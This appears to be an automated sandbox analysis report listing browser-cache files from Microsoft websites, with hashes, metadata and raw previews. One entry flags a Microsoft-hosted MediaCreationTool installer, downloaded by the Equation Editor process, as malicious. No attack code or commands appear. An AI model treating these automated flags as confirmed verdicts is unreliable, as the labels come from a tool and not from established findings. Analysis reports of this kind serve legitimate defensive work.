                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):266727
                                                                                                                                                                                                              Entropy (8bit):5.0713816871675546
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:iwzddg8HPbn/hL4fbv3DlF+ERyfJY6F0AJL55gGHjkzmEeTPNbaRgJ4J0ZRV8+uz:LLkJeTvZgTFR
                                                                                                                                                                                                              MD5:CD550A08D90AFDA203C05C2E1206C910
                                                                                                                                                                                                              SHA1:55556B38A332624E453B88EDA0E7DF28F08839D9
                                                                                                                                                                                                              SHA-256:484C03B4E10AC1E2C8FB531A3988A7F95A3F9FFA21E3CEDC1AB826565412695F
                                                                                                                                                                                                              SHA-512:5EED162FCCAFB14A9E9BF7775700C5DA9B5F7019CAA59B33CEB451AC020E21A0FFFD53D29E72D76F644F2540F2BF9A763F3761196261DE7F2ACDA8953F3CFDC3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/MICROSOFT-365/_scrf/css/themes=default.device=uplevel_web/42-6d7c67/e7-e4b626/4b-514590/2c-635258/97-8c42a8/33-100b4f/81-8f5a7f/b5-285959/c3-c2d1cf/21-7d6c87/c7-542157/c3-953460/71-219a9b/6c-2dbc3f/bf-60f63e/50-55fec2/c0-379397/fd-9178b9/52-7ec320?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: @charset "UTF-8";.x-hidden-none-mobile-vp{display:none !important}@media screen and (-ms-high-contrast:active){.c-uhfh button,.c-uhfh .glyph-shopping-cart,.c-me .msame_Header{border:none !important}.c-logo{margin-right:1px;border:none !important;outline:none !important}.c-logo.c-cat-logo:focus>span:before,.c-logo.c-cat-logo:hover>span:before{background:WindowText}.c-uhf-nav-link{border:none !important}.c-uhf-nav-link:hover{text-decoration:underline !important}#search{background:Window;color:WindowText}#search span{vertical-align:top}.c-uhfh.c-sgl-stck .c-uhf-menu button:focus,.c-uhfh.c-sgl-stck .c-uhf-menu span:focus,.c-uhfh.c-sgl-stck .c-uhf-menu a:focus,.c-uhfh.c-sgl-stck .c-uhf-nav-link:focus,.c-uhfh.c-sgl-stck .c-logo.c-sgl-stk-uhfLogo:focus,.c-uhfh.c-sgl-stck .c-logo.c-cat-logo:focus,.c-uhfh.c-sgl-stck .c-search #search:focus,.c-uhfh.c-sgl-stck .glyph-shopping-cart:focus,.c-uhfh.c-sgl-stck .glyph-global-nav-button:focus,.c-uhfh.c-sgl-stck .glyph-shopping-bag:focus{outline:2px soli
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\63537622-7cd9-4228-8d9d-46eb5bf168af[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):186007
                                                                                                                                                                                                              Entropy (8bit):7.897254240575336
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:pLnhX0s44jetEVL9tbUXslSX2y2Kz+gHQojFbn0U/ClS9fHahWmRxI:tnl0ujeehb4gZKC40U/J9ChWmY
                                                                                                                                                                                                              MD5:EDAA0FFBD84ADEF5E70F854555A5CD25
                                                                                                                                                                                                              SHA1:56E4EF998D2715172E0CFCD0B6054240736E7CE3
                                                                                                                                                                                                              SHA-256:FEE39DAA2BC33943CB69B526B63366AB26D78F0DAE42C3EBCB76421D6A8A43CD
                                                                                                                                                                                                              SHA-512:56689D88973390C4CC9B167D5E1C8DB9E682BE63B51486435F490E011DBF6C8E3D972C78297A8C56B4A665752514514820CBD57705A20ADB44705F4C9870A7C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/63/53/63537622-7cd9-4228-8d9d-46eb5bf168af.jpg?n=PCGP_Page-Hero-1084_Trion_1920x720_04.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d....................................................................................................g..........!..1."AQ.2aq.#BR...S....$3Cbr....%TUs.........4Et.....&'()*56789:DFGHIJVWXYZcdefghijuvwxyz.............................................................................D7.......!..1AQa.."q..2......BR.#3b....Sr...........$%&'()*456789:CDEFGHIJTUVWXYZcdefghijstuvwxyz...............................................................................?......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\65-478888[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):97840
                                                                                                                                                                                                              Entropy (8bit):5.0718809304164765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:C+zddgKHPbn/hLOfbv3DlFeEPyf5Y6FtgAJL55OGHlkzmsez1ZLuUbM5aiRyJYJt:C+zddgKHPbn/hLOfbv3DlFeEPyf5Y6FK
                                                                                                                                                                                                              MD5:B1BF401F095A2BC56F0D4419E30F2C9B
                                                                                                                                                                                                              SHA1:9E050F10E1D9B56D77A7A7D7AD0D6A34DFB07285
                                                                                                                                                                                                              SHA-256:9211E093878B6D231120579184DEC59E025FB4F6D9A4CABD133ED608F98B3A65
                                                                                                                                                                                                              SHA-512:93B7FAC8CE9D0F85B0D33834AF1B0135D3AC05FB51B96597B98BE6AF0CFFAF156BF232A4940AF1F3B9A26565E5E4F94731C2666FD6123D8C13DCD55FADE8CA25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/mscomhp/_scrf/css/themes=default.device=uplevel_web/42-6d7c67/57-7b1339/37-e29aca/21-7d6c87/5a-e79275/52-7ec320/65-478888?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: ..x-hidden-none-mobile-vp{display:none !important}@media screen and (-ms-high-contrast: active){.c-uhfh button,.c-uhfh .glyph-shopping-cart,.c-me .msame_Header{border:none !important}.c-logo{margin-right:1px;border:none !important;outline:none !important}.c-logo.c-cat-logo:focus>span:before,.c-logo.c-cat-logo:hover>span:before{background:WindowText}.c-uhf-nav-link{border:none !important}.c-uhf-nav-link:hover{text-decoration:underline !important}#search{background:Window;color:WindowText}#search span{vertical-align:top}.c-uhfh.c-sgl-stck .c-uhf-menu button:focus,.c-uhfh.c-sgl-stck .c-uhf-menu span:focus,.c-uhfh.c-sgl-stck .c-uhf-menu a:focus,.c-uhfh.c-sgl-stck .c-uhf-nav-link:focus,.c-uhfh.c-sgl-stck .c-logo.c-sgl-stk-uhfLogo:focus,.c-uhfh.c-sgl-stck .c-logo.c-cat-logo:focus,.c-uhfh.c-sgl-stck .c-search #search:focus,.c-uhfh.c-sgl-stck .glyph-shopping-cart:focus,.c-uhfh.c-sgl-stck .glyph-global-nav-button:focus,.c-uhfh.c-sgl-stck .glyph-shopping-bag:focus{outline:2px solid WindowText
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\94-3cd1e0[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):68489
                                                                                                                                                                                                              Entropy (8bit):5.371151075731659
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:7tV81ICDVRgJhAiUinqgDRQ7wYv6uxhBANIu:7v81+einqgD8Q
                                                                                                                                                                                                              MD5:5D7F2F04176CC5D3CAE1BCDB15EED40C
                                                                                                                                                                                                              SHA1:86E9C4DF0796E3A8146B751D3BB168860F838A82
                                                                                                                                                                                                              SHA-256:BABE97146AADB62C442E7BE58A72479B4F1760F76D45B7027C8347F00964662A
                                                                                                                                                                                                              SHA-512:EA448E9DF2780A804F1FA86AD667C6CAD6D112F7448C84A0B86DC2917390014C2367B3E057DEEA112B8C99607985DE99CD9561193B389B3DE4F02D7C76331F08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/MICROSOFT-365/_scrf/js/themes=default/9e-bcc229/94-3cd1e0?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var awa,behaviorKey;define("jsllConfig",["rawJsllConfig"],function(n){n.cookiesToCollect=["_mkto_trk"];var t=window._pageBITags.pageTags;return n.ix={a:t.userConsent||!1,g:t.userConsent||!1},n});awa=awa||{};awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNI
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\94-3cd1e0[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):68375
                                                                                                                                                                                                              Entropy (8bit):5.370837839922446
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gtV81ICDVRgJhAiUinqgDRQ7wYv6uxhBANIu:gv81+einqgD8Q
                                                                                                                                                                                                              MD5:53475B50CF354A3E5CCBB0740A2AE553
                                                                                                                                                                                                              SHA1:9166969D9B0D89321B6BD0A754E3DEE54C2B7B11
                                                                                                                                                                                                              SHA-256:EEA90E1F236FD6CED5D08C19B424BC7D36A1679C3B87B71C560365AED4888FF3
                                                                                                                                                                                                              SHA-512:D53A98168F82CFDCC02CEF55D73EE40D4F1D32EDB8AC85256182D88F3609FEEAB7A5186B4527BC7B5AA77CB06930E324C8A56CB49F3CC71E1A02D5B539439637
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/microsoft-365/_scrf/js/themes=default/78-6f121b/94-3cd1e0?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var awa,behaviorKey;define("jsllConfig",["rawJsllConfig"],function(n){return n});awa=awa||{};awa.isInitialized=!1;awa.verbosityLevels={NONE:0,ERROR:1,WARNING:2,INFORMATION:3};awa.behavior={UNDEFINED:0,NAVIGATIONBACK:1,NAVIGATION:2,NAVIGATIONFORWARD:3,APPLY:4,REMOVE:5,SORT:6,EXPAND:7,REDUCE:8,CONTEXTMENU:9,TAB:10,COPY:11,EXPERIMENTATION:12,PRINT:13,SHOW:14,HIDE:15,MAXIMIZE:16,MINIMIZE:17,BACKBUTTON:18,STARTPROCESS:20,PROCESSCHECKPOINT:21,COMPLETEPROCESS:22,SCENARIOCANCEL:23,DOWNLOADCOMMIT:40,DOWNLOAD:41,SEARCHAUTOCOMPLETE:60,SEARCH:61,SEARCHINITIATE:62,TEXTBOXINPUT:63,PURCHASE:80,ADDTOCART:81,VIEWCART:82,ADDWISHLIST:83,FINDSTORE:84,CHECKOUT:85,REMOVEFROMCART:86,PURCHASECOMPLETE:87,VIEWCHECKOUTPAGE:88,VIEWCARTPAGE:89,VIEWPDP:90,UPDATEITEMQUANTITY:91,INTENTTOBUY:92,PUSHTOINSTALL:93,SIGNIN:100,SIGNOUT:101,SOCIALSHARE:120,SOCIALLIKE:121,SOCIALREPLY:122,CALL:123,EMAIL:124,COMMUNITY:125,SOCIALFOLLOW:126,VOTE:140,SURVEYINITIATE:141,SURVEYCOMPLETE:142,REPORTAPPLICATION:143,REPORTREVIEW:144,SURV
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\96ecf9ff-81f4-4e9a-9288-9ccf4fa8d8f4[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):58750
                                                                                                                                                                                                              Entropy (8bit):7.56865439042534
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:ZrO0z28KAcXaFLCD8ASaMpEpZnBqJbG/JuncQOv3vkeyyEl5j0/a7Xt25lZ+mxX+:ZrPFLe8ASaiG9unU3jyyEl5jxEz5X+
                                                                                                                                                                                                              MD5:0045D67BF858CACA6462FCE5375D896B
                                                                                                                                                                                                              SHA1:123877812FB40FA1476C3AF4B470EAA8C389AAD2
                                                                                                                                                                                                              SHA-256:5EF6D8B87E9516A85680D07B5B8501FF5606E1CF47BAEE5C6417F09D56FC8C4B
                                                                                                                                                                                                              SHA-512:0CA6BCA11F457805837F60032A32370931F9AC52E1259A5BDB21FB5A93C2F8CF87B8FEAD6A1AEC5C440A2C9C9D99B98BAD5204998991B04DE8D006B84B7F3836
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.content.office.net/en-us/media/96ecf9ff-81f4-4e9a-9288-9ccf4fa8d8f4.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.....................pHYs.................sRGB.........gAMA......a.....IDATx......Wa&....&o.W.m.clV.B..%.b....$31/.1..,.$p3.0..<..Kx.$...$d.0..6.. .m-6.0$....U.W.....Y.t.O....[uuu.s.:'......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\DevCMDL2.2.50[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 18316, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):18316
                                                                                                                                                                                                              Entropy (8bit):7.9723714142137005
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:IEFSq9E2tE4pcKefQXGClbgiM0ARalFAEOMOh/wzguNUoO:jcQq4KKMILM0calOFM8T
                                                                                                                                                                                                              MD5:0CEDBB5E7888349E4705A66EDE3DD01C
                                                                                                                                                                                                              SHA1:BFF3C70DBD94C866BDEFC48E7BBA1D8F359577AC
                                                                                                                                                                                                              SHA-256:12D95D8D400EEAFA0258E9D29D6EA5EF0EC9CFC1410B75E47976FCB3F92082B0
                                                                                                                                                                                                              SHA-512:02738ACFAC17A4F51EEFF92F6FD001A4C874B077E3A31B079D9A3E84D551292A26A9D32EE2970C933ACC716A785C843EA7ABF51620C69251E7EE674A7EF28ACD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socfonts/DevCMDL2.2.50.woff
                                                                                                                                                                                                              Preview: wOFF......G.......~.........................OS/2...X...H...`JZ{.VDMX.............^.qcmap.......%...hT%..cvt ....... ...*....fpgm...........Y...gasp................glyf......8...cL...Ihead..?....6...6...rhhea..?........$....hmtx..@....|....'...loca..@............Jmaxp..A.... ... ....name..A....F........post..F........ .Q.wprep..G.........x...x.c`f..8.....u..1...4.f...$..........@ ..........._*8.|...V...)00......x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x..]H.Q....Z[.....7........CE!.d!.."$-D**%....!2Z..6....0.0
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ErrorPageTemplate[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2168
                                                                                                                                                                                                              Entropy (8bit):5.207912016937144
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                                                              MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                                                              SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                                                              SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                                                              SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                                                              Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MeControl_HMuKYHTRtxjWQ-nqLwSv3w2[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17262
                                                                                                                                                                                                              Entropy (8bit):5.45150627760132
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:JViPE0pbgrw/vb+MQbBRsWyWhP6P7VsUjf6HryTznPoA:JViBgrkusWhPoT6HryTzoA
                                                                                                                                                                                                              MD5:1CCB8A6074D1B718D643E9EA2F04AFDF
                                                                                                                                                                                                              SHA1:D29DA81C9E3BAA5EC758074BED2B3A08F0695CA5
                                                                                                                                                                                                              SHA-256:500D164EC7407D1E776E1C42408E785E41089481CF8CFB58BFD880F1A2AED29B
                                                                                                                                                                                                              SHA-512:43454AC8500AB94ACB057AF42D94CD602CC613B12AD2B85A85D3FB42DC3E6F3ED446AFADBD14C0C3B92830A3127E9EA95A86A606808A037D5DF0041B34901AFD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://logincdn.msauth.net/16.000/content/js/MeControl_HMuKYHTRtxjWQ-nqLwSv3w2.js
                                                                                                                                                                                                              Preview: function _iz(a){return a?true:a==0||a==false||a==""}function _Du(a,b){return _iz(a)?a:b}function _J(a){return a instanceof Array}function _BD(a){return "function"._g3(typeof a,true)}function _F(a){return typeof a=="string"}function _BE(a){return _iz(a)&&_F(a)&&a!=""}function strOrDefault(a,b){return _BE(a)?a:b}function _A3(a){if(!_F(a))return "";if(a.lastIndexOf(".")<0)return "";return a.toLowerCase().substr(a.lastIndexOf(".")+1,a.length)}function _A2(a){return document.getElementById(a)}var $J={_dx:false,_b:function(c,a){var d=null;if("img"._g3(c)&&_iz(a)){var g=_A3(a.src);if("png"._g3(g,true)&&!$F._ml())c="span"}var b=d;if("input"._g3(c,true)&&_iz(a)&&(a.name||a.type)){if(!$aE._i._g3(a.type)){var f=document.createElement("div");f.innerHTML='<input type="'+(a.type?a.type:"")+'" name="'+(a.name?a.name:"")+'" />';b=f.firstChild}else try{var e="<"+c;if(a.type)e+=' type="'+a.type+'"';if(a.name)e+=' name="'+a.name+'"';e+=">";b=document.createElement(e)}catch(h){b=d}if(_iz(b)){a.type=d;a.na
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Me[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2347
                                                                                                                                                                                                              Entropy (8bit):5.290031538794594
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:gCgF0+kNL5iQ6+GhB+SYWzGuesAFcsGJOzgO6FIEv+sj+M++sx+suse+swsosmC0:gC3Na5+GX+Ti2XsYE2sqAsosushswsoB
                                                                                                                                                                                                              MD5:E86EF8B6111E5FB1D1665BCDC90888C9
                                                                                                                                                                                                              SHA1:994BF7651CB967CD9053056AF2D69ACB74DB7F29
                                                                                                                                                                                                              SHA-256:3410242720DE50B090D07A23AEE2DAD879B31D36F2615732962EC4CFA8A9D458
                                                                                                                                                                                                              SHA-512:2486B491681EE91A9CD1ECC9AA011A3FB34B48358C5D7A4D503A5357BC5CE4CA22999F918D40AC60A3063940D5F326FC7E4E5713D89D5C102DE68824E371B3AB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                              Preview: <script type="text/javascript">!function(n,t){for(var e in t)n[e]=t[e]}(this,function(n){function t(i){if(e[i])return e[i].exports;var s=e[i]={exports:{},id:i,loaded:!1};return n[i].call(s.exports,s,s.exports,t),s.loaded=!0,s.exports}var e={};return t.m=n,t.c=e,t.p="",t(0)}([function(n,t){function e(n){for(var t=g[c],e=0,i=t.length;e<i;++e)if(t[e]===n)return!0;return!1}function i(n){if(!n)return null;for(var t=n+"=",e=document.cookie.split(";"),i=0,s=e.length;i<s;i++){var o=e[i].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===o.indexOf(t))return o.substring(t.length)}return null}function s(n,t,e){if(n)for(var i=n.split(":"),s=null,o=0,a=i.length;o<a;++o){var l=null,c=i[o].split("$");if(0===o&&(s=parseInt(c.shift()),!s))return;var p=c.length;if(p>=1){var f=r(s,c[0]);if(!f||e[f])continue;l={signInName:f,idp:"msa",isSignedIn:!0}}if(p>=3&&(l.firstName=r(s,c[1]),l.lastName=r(s,c[2])),p>=4){var g=c[3],m=g.split("|");l.otherHashedAliases=m}if(p>=5){var h=parseInt(c[4],16);h&&(l.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MediaCreationTool20H2[1].exe
                                                                                                                                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):19463448
                                                                                                                                                                                                              Entropy (8bit):5.233180679376348
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:196608:MmtHa+5hH1km/Sf7byFXKEBmih9S5rQ5FNFl001p4Ki:Y+5RB/SDbyFBH9eQD/l00/4
                                                                                                                                                                                                              MD5:AA2AD37BB74C05A49417E3D2F1BD89CE
                                                                                                                                                                                                              SHA1:1BF5F814FFE801B4E6F118E829C0D2821D78A60A
                                                                                                                                                                                                              SHA-256:690C8A63769D444FAD47B7DDECEE7F24C9333AA735D0BD46587D0DF5CF15CDE5
                                                                                                                                                                                                              SHA-512:FAB34CCBEFBCDCEC8F823840C16AE564812D0E063319C4EB4CC1112CF775B8764FEA59D0BBAFD4774D84B56E08C24056FA96F27425C4060E12EB547C2AE086CC
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              IE Cache URL:https://download.microsoft.com/download/4/c/c/4cc6c15c-75a5-4d1b-a3fe-140a5e09c9ff/MediaCreationTool20H2.exe
                                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L...-.-.-..E.-.F.-.F.-.F.-.F.-.-../.F..-.F...-.F.-.Rich.-.........PE..L....JJ..................|...........)............@...................................)...@...... ..........................<.......................X.(..!...0...f...[..T....................M......8M..@...............8............................text...0{.......|.................. ..`.data...p1..........................@....idata...+.......,..................@..@.boxload@...........................@..@.rsrc.... ..........................@..@.reloc...f...0...h.................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Prefooter_Icon-19_Community[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1348
                                                                                                                                                                                                              Entropy (8bit):4.456440022830228
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tu1jkD8d76KYyZcdT+Yn08lPHwBao9fQOWNS8RF6+gWyv960YiSzNT:0j88dSyCdT+YnhxQBasfQOixRo6TiIT
                                                                                                                                                                                                              MD5:E5B67DCFF829BD2B2168961DC39DFC5B
                                                                                                                                                                                                              SHA1:8DFCE4D60A6369AB410DE865CEB139E54223BD66
                                                                                                                                                                                                              SHA-256:4F52C44E4B9296F008E79C7C46FEB21028C0FBB9D5F1CE59F390C1B86EA6D1C4
                                                                                                                                                                                                              SHA-512:FE4CF05C7A8BC230CB3EEB688DACD267E6DD3426BDE1FCD6AF6BFDE468BACC5266F0E0D6A3C4E479FCBEC0115C34C85908B6C21A63EF19735FC6DD8AB65A3D95
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon-19_Community.svg?version=4a149663-0cd4-3657-a2e5-828f12093a87
